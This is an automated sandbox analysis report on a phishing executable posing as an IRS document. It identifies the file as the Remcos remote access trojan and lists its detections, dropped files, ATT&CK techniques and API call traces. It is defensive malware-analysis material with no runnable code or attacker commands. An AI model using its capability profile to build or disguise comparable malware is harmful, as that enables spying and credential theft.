Loading ...

Play interactive tourEdit tour

Analysis Report irs Doc Attached.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:222924
Start date:16.04.2020
Start time:03:15:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 13s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:irs Doc Attached.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@28/7@5/2
EGA Information:
  • Successful, ratio: 57.1%
HDC Information:
  • Successful, ratio: 69% (good quality ratio 53.9%)
  • Quality average: 61.8%
  • Quality standard deviation: 40.2%
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 74
  • Number of non-executed functions: 309
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 2.18.68.82, 93.184.221.240
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, drive.google.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Execution Graph export aborted for target Kaphpos.exe, PID 1824 because there are no executed function
  • Execution Graph export aborted for target Kaphpos.exe, PID 5196 because there are no executed function
  • Execution Graph export aborted for target irs Doc Attached.exe, PID 5488 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Remcos
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12Registry Run Keys / Startup Folder11Access Token Manipulation1Software Packing1Credential Dumping1System Time Discovery1Remote File Copy21Screen Capture1Data Encrypted1Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaExecution through API2Scheduled Task1Process Injection522Deobfuscate/Decode Files or Information1Credentials in Files2Account Discovery1Remote ServicesInput Capture211Exfiltration Over Other Network MediumRemote File Copy21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
External Remote ServicesGraphical User Interface11Modify Existing Service1Scheduled Task1Scripting12Input Capture211Security Software Discovery11Windows Remote ManagementClipboard Data2Automated ExfiltrationStandard Cryptographic Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseCommand-Line Interface11Application Shimming1Application Shimming1Obfuscated Files or Information2Credentials in FilesSystem Service Discovery1Logon ScriptsInput CaptureData EncryptedRemote Access Tools1SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationService Execution2New Service1New Service1Masquerading111Account ManipulationFile and Directory Discovery3Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkScheduled Task1Modify Existing ServiceNew ServiceModify Registry1Brute ForceSystem Information Discovery35Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskVirtualization/Sandbox Evasion1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryProcess Discovery2Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection522Input PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsIndicator Removal from ToolsPrivate KeysRemote System Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\Public\Kaphkos.exeVirustotal: Detection: 9%Perma Link
Source: C:\Users\Public\Kaphpos.exeVirustotal: Detection: 12%Perma Link
Source: C:\Users\Public\Kaphpos.exeReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted fileShow sources
Source: irs Doc Attached.exeVirustotal: Detection: 12%Perma Link
Source: irs Doc Attached.exeReversingLabs: Detection: 28%
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 3740, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 660, type: MEMORY
Source: Yara matchFile source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 16.2.ieinstal.exe.180000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 16.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 2.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 2.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_105360A8 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,2_2_105360A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10534D75 FindFirstFileW,2_2_10534D75
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10544133 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,2_2_10544133
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10536534 FindFirstFileW,FindNextFileW,FindClose,2_2_10536534
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10538E6F getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,2_2_10538E6F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10541F40 FindFirstFileW,2_2_10541F40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10538BE3 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,2_2_10538BE3
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404298 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404298
